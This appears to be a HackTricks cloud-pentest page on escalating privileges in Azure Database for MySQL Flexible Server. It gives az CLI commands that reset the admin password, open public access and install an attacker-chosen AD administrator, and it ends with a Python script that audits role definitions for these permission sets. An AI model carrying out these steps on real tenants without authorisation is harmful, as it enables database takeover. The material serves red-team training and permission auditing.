Az - MySQL Database Privesc
{% hint style="success" %}
Learn & practice AWS Hacking: HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks

- Check the subscription plans!
- Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
- Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.
{% endhint %}
# MySQL Database Privesc

For more information about Azure Database for MySQL, check:

{% content-ref url="../az-services/az-mysql.md" %}
[az-mysql.md](../az-services/az-mysql.md)
{% endcontent-ref %}
### "Microsoft.DBforMySQL/flexibleServers/read" && "Microsoft.DBforMySQL/flexibleServers/write"

With these permissions, you can create, update, or delete MySQL Flexible Server instances on Azure: provisioning new servers, modifying the configuration of existing servers, or decommissioning servers.
{% code overflow="wrap" %}
```bash
az mysql flexible-server create \
  --name <ServerName> \
  --resource-group <ResourceGroupName> \
  --location <Location> \
  --admin-user <AdminUsername> \
  --admin-password <AdminPassword> \
  --sku-name <SkuName> \
  --storage-size <StorageSizeInGB> \
  --tier <PricingTier> \
  --version <MySQLVersion>
```
{% endcode %}
For example, these permissions allow changing the MySQL admin password, which is of course useful when MySQL password authentication is enabled.
{% code overflow="wrap" %}
```bash
az mysql flexible-server update \
  --resource-group <resource_group_name> \
  --name <server_name> \
  --admin-password <password_to_update>
```
{% endcode %}
Additionally, public access must be enabled on the server if you want to connect to it from anywhere other than a private endpoint. To enable it:
{% code overflow="wrap" %}
```bash
# `az mysql flexible-server update` takes the server name via --name / -n
az mysql flexible-server update --resource-group <resource_group_name> --name <server_name> --public-access Enabled
```
{% endcode %}
### "Microsoft.DBforMySQL/flexibleServers/read", "Microsoft.DBforMySQL/flexibleServers/write", "Microsoft.ManagedIdentity/userAssignedIdentities/assign/action", "Microsoft.DBforMySQL/flexibleServers/administrators/write" && "Microsoft.DBforMySQL/flexibleServers/administrators/read"

With these permissions, you can configure Azure Active Directory (AD) administrators for a MySQL Flexible Server. This can be exploited by setting yourself or another account as the AD administrator, which grants full administrative control over the MySQL server. Note that the flexible server must have a user-assigned managed identity that can be used for this.
{% code overflow="wrap" %}
```bash
az mysql flexible-server ad-admin create \
  --resource-group <ResourceGroupName> \
  --server-name <ServerName> \
  --display-name <ADAdminDisplayName> \
  --identity <IdentityNameOrID> \
  --object-id <ObjectID>
```
{% endcode %}
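To find out which roles in a subscription actually hand out the two permission combinations described in this page (the server read/write pair above, and the longer set needed to assign an AD administrator), you can audit the role definitions returned by `az role definition list --custom-role-only true`. The script below is an added example, not part of HackTricks or of the Azure CLI: it takes role definitions in the JSON shape that command prints (only the `roleName` and `permissions` fields are used), expands Azure RBAC `*` wildcards and `notActions` exclusions, and reports which of the page's privesc paths each role enables. The three role definitions embedded in it are constructed samples, not real Azure built-in roles; the path labels `server-write` and `ad-admin` are names chosen here.

```python
import fnmatch
import json

# Privesc paths from this page, as the Azure RBAC actions each one requires.
# Labels ("server-write", "ad-admin") are this script's own, not Azure terms.
PRIVESC_PATHS = {
    "server-write": [  # reset admin password / enable public access
        "Microsoft.DBforMySQL/flexibleServers/read",
        "Microsoft.DBforMySQL/flexibleServers/write",
    ],
    "ad-admin": [  # set an AD administrator on the server
        "Microsoft.DBforMySQL/flexibleServers/read",
        "Microsoft.DBforMySQL/flexibleServers/write",
        "Microsoft.ManagedIdentity/userAssignedIdentities/assign/action",
        "Microsoft.DBforMySQL/flexibleServers/administrators/write",
        "Microsoft.DBforMySQL/flexibleServers/administrators/read",
    ],
}

# Constructed sample in the shape of `az role definition list` output
# (trimmed to the fields this script reads). Not real built-in roles.
SAMPLE_ROLE_DEFINITIONS = json.loads("""
[
  {"roleName": "MySQL Operator (constructed)",
   "permissions": [{"actions": ["Microsoft.DBforMySQL/flexibleServers/read",
                                "Microsoft.DBforMySQL/flexibleServers/write"],
                    "notActions": []}]},
  {"roleName": "DB Wildcard (constructed)",
   "permissions": [{"actions": ["Microsoft.DBforMySQL/*",
                                "Microsoft.ManagedIdentity/userAssignedIdentities/assign/action"],
                    "notActions": ["Microsoft.DBforMySQL/flexibleServers/delete"]}]},
  {"roleName": "Read Only (constructed)",
   "permissions": [{"actions": ["*/read"], "notActions": []}]}
]
""")


def action_matches(pattern, action):
    """Azure RBAC action strings are case-insensitive and '*' matches any
    run of characters, slashes included (so 'Microsoft.DBforMySQL/*' covers
    every action under that provider). fnmatch's '*' has the same semantics."""
    return fnmatch.fnmatchcase(action.lower(), pattern.lower())


def granted_actions(role_def, wanted):
    """Subset of `wanted` that the role effectively grants: an action counts
    only if some 'actions' entry matches it and no 'notActions' entry does."""
    perms = role_def.get("permissions", [])
    actions = [a for p in perms for a in p.get("actions", [])]
    not_actions = [a for p in perms for a in p.get("notActions", [])]
    granted = set()
    for w in wanted:
        allowed = any(action_matches(p, w) for p in actions)
        denied = any(action_matches(p, w) for p in not_actions)
        if allowed and not denied:
            granted.add(w)
    return granted


def find_privesc_paths(role_def):
    """Sorted labels of the paths whose full action set the role grants."""
    return sorted(
        label for label, wanted in PRIVESC_PATHS.items()
        if granted_actions(role_def, wanted) == set(wanted)
    )


def audit(role_defs=SAMPLE_ROLE_DEFINITIONS):
    """Map each role name to the privesc paths it enables ([] means none)."""
    return {r["roleName"]: find_privesc_paths(r) for r in role_defs}


if __name__ == "__main__":
    for name, paths in audit().items():
        print(f"{name}: {', '.join(paths) if paths else 'no MySQL privesc path'}")
```

To run it against real data, pipe `az role definition list --custom-role-only true -o json` into `json.load` and pass the result to `audit()`. Roles that light up `ad-admin` deserve the closest review, since the managed-identity `assign/action` right is what turns server write access into full database ownership.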